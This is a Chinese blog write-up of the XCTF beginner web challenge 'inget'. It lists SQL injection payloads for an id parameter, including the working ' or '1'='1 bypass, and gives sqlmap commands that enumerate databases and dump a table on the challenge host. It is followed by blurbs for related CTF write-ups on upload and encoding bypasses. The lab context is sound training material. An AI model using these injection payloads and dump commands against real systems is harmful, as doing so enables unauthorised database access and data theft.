攻防世界-Web-新手-inget

最新推荐文章于 2024-06-13 02:53:18 发布
最新推荐文章于 2024-06-13 02:53:18 发布
阅读量239 收藏 1
点赞数 9
分类专栏: ctf-攻防世界 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45653478/article/details/136713379
版权

题目描述

在线环境

解题思路

方法1 尝试SQL注入

?id=1 or 1=1--+

?id=1'or 1=1--+

?id=1"or 1=1--+

?id=1)or 1=1--+

?id=1')or 1=1--+

?id=1") or 1=1--+

?id=1"))or 1=1--+

都均无回显

?id=1' or '1'='1

回显出flag

Please enter ID,and Try to bypass

nice : congratulations

Flag Is : cyberpeace{9d09c60109807334145fe7162ccfdbb0}

方法2 sqlmap注入

sqlmap -u http://61.147.171.105:55016/?id=1 -dbs

爆cybert表中的数据

sqlmap -u http://61.147.171.105:55016/?id=1 -T cyber --dump

flag为:cyberpeace{9d09c60109807334145fe7162ccfdbb0}

乐队1
关注
  • 9
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
m box 2 mini 驱动
11-08
m box 2 mini 驱动
攻防世界-Web-inget新手
wangwei011的博客
05-16 1122
攻防世界-Web-inget
攻防世界——web新手和引导模式(全解)
热门推荐
小白一枚多多关注的博客
12-20 2万+
全新攻防世界web新手题目,小白重新归来
攻防世界-新手模式2
m0_73960954的博客
10-19 107
本题需要利用文件上传漏洞点,通过绕过服务器的安全防护,达到getshell的目的。打开只看到Please enter ID,and Try to bypass。本题的主要考点为利用fastcgi的.user.ini特性进行任意命令执行。id=1' or 1=1-- -检查后缀中是否有htaccess或ph。检查文件内容是否有php字符串。这里需要绕过的点如下。
攻防世界web新手题知识点WriteUP及知识点讲解(超超超详细)
qq_62604985的博客
09-19 931
在url处进入 /robots.txt 查看到以下页面。尝试访问fl0g.php文件得到flag。
Web安全攻防世界01 fileinclude(宜兴网信办)
weixin_42789937的博客
11-26 3758
Web安全攻防世界01 fileinclude,文件包含类型题目,参考大佬们的WP有所补充,内容对小白友好~
攻防世界web新手区刷题
m0_64583632的博客
11-22 668
攻防世界新手区随机刷题file_include、easyphp、inget、fakebook、Web_python_template_injection
攻防世界题目练习——Web难度1(一)
qq_48550824的博客
08-31 288
查看phps的源码可以看到,对获取的id参数进行url解码后的id内容如果为admin,则可获得flag,并且不允许直接获取的id为admin,但传入在url的参数本身在获取时就会经历一次url解码,因此要对admin进行两次编码。再将后缀名修改为jpg,然后上传,这个文件可以绕过前面的4项检查,但是上传的是jpg文件不会直接被当作php来执行,因此需要前面的.user.ini文件来将这个文件添加到其他的php文件中来执行。},即可获得flag。
攻防世界新手区部分web wp 2
fcz___的博客
02-09 1263
攻防世界web新手区部分wp
CTF_web_新手模式题目集(ing)
Eric___Qu的博客
11-18 134
在此记录学习ctf的过程。
网络安全(补充)
m0_62207482的博客
06-11 1016
同步包风暴(SYN Flood)攻击者假造源网址发送多个同步数据包(SYN Packet)给服务器,服务器因无法收到确认数据包(ACK Packet),使TCP/IP协议三次握手无法顺利完成,因而无法建立连接。其原理是发送大量半连接状态的服务请求,使服务主机无法处理正常的连接请求,因而影响正常运作 泪滴攻击暴露出IP数据包分解与重组的弱点,当IP数据包在网络中传输时,会被分解成许多不同的包传送,并借由偏移量字段作为重组的依据。泪滴攻击通过加入过多或不必要的偏移量字段,使计算机系统重组错乱,产生不可预期的后
网络安全扫盲篇名词解释之“挖矿“
weixin_39266374的博客
06-11 981
挖矿、比特币、区块链
网络安全练气篇——OWASP TOP 10
weixin_55762309的博客
06-13 755
OWASP(开放式Web应用程序安全项目)是一个开放的社区,由非营利组织 OWASP基金会支持的项目。对所有致力于改进应用程序安全的人士开放,旨在提高对应用程序安全性的认识。其最具权威的就是“10项最严重的Web 应用程序安全风险列表” ,总结并更新Web应用程序中最可能、最常见、最危险的十大漏洞,是开发、测试、服务、咨询人员应知应会的知识。最重要的版本应用程序中最严重的十大风险。
专家解读 | NIST网络安全框架(3):层级配置
Enlink_Young的博客
06-11 902
NIST 明确指出,CSF层级并非成熟度模型,而是一种指导性的方法,用于阐明网络安全风险管理和企业运营风险管理之间的关系,简而言之,层级提供了一条清晰的路径,将网络安全风险纳入企业的整体组织风险中,同时作为评估当前网络安全风险管理实践的基准,帮助组织制定改善其网络安全状况的计划。NIST CSF在核心部分提供了六个类别的关键功能和子功能,并围绕CSF的使用提供了层级(Tier)和配置(Profile)两种工具,使不同组织和用户更方便有效地使用CSF,本文将深入探讨CSF层级和配置的主要内容,及其使用方法。
网络安全练气篇——PHP编程语言基础
最新发布
weixin_55762309的博客
06-13 815
(外文名:PHP:Hypertext Preprocessor,中文名:“超文本预处理器”) 是一种通用开源脚本语言。语法吸收了C语言、Java和Perl的特点,利于学习,使用广泛,主要适用于Web开发领域。用PHP做出的动态页面与其他的编程语言相比,PHP是将程序嵌入到HTML(标准通用标记语言下的一个应用) 文档中去执行,执行效率比完全生成HTML标记的CGI要高许多,PHP还可以执行编译后代码,编译可以达到加密和优化代码运行,使代码运行更快。
MCK主机加固:智能科技,构筑网络安全的铜墙铁壁
cnsinda_sdc的博客
06-11 452
它通过行为分析,区分正常操作与恶意行为,确保在不影响业务运行的前提下,实现最高级别的安全防护。MCK主机加固产品,以其创新技术,为企业提供了一个全面、智能、高效的安全解决方案。MCK深知数据的价值,因此提供了端到端的数据加密解决方案,确保数据在传输和存储过程中的安全性。面对安全事件,MCK主机加固产品能够自动执行预定义的安全策略,如隔离受感染的系统、限制可疑流量等,减少对人工干预的依赖,提高响应速度。MCK不断投入研发,紧跟最新的安全趋势和技术发展,定期更新产品功能,确保用户始终处于网络安全的最前沿。
【网络安全】【深度学习】【入侵检测】SDN模拟网络入侵攻击并检测,实时检测,深度学习【二】
q742971636的博客
06-12 273
以通过 Alt+F2 然后输入 xterm 尝试打开xterm。这之后就可以用Ctrl+Alt+T打开新终端了。在之前的代码中,已经捕获到攻击流量并打印。
网络安全在个人生活中具体有哪些常见的应用场景?
2301_79955948的博客
06-10 427
通过上述场景可以看出,网络安全在个人生活中扮演着至关重要的角色,它不仅关系到个人隐私和财产安全,也影响到日常生活的方方面面。7. 物联网设备安全:网络安全可以保护智能家居、智能设备等物联网设备的安全,避免网络攻击和数据泄露。5. 远程办公和学习:网络安全可以保障企业和学校网络系统的安全和稳定性,避免数据泄露和网络攻击。6. 云存储和备份:网络安全可以保护云存储服务和备份数据的安全,防止黑客攻击和数据泄露。8. 移动设备安全:网络安全可以保护移动设备的安全和数据隐私,防止恶意软件和网络攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值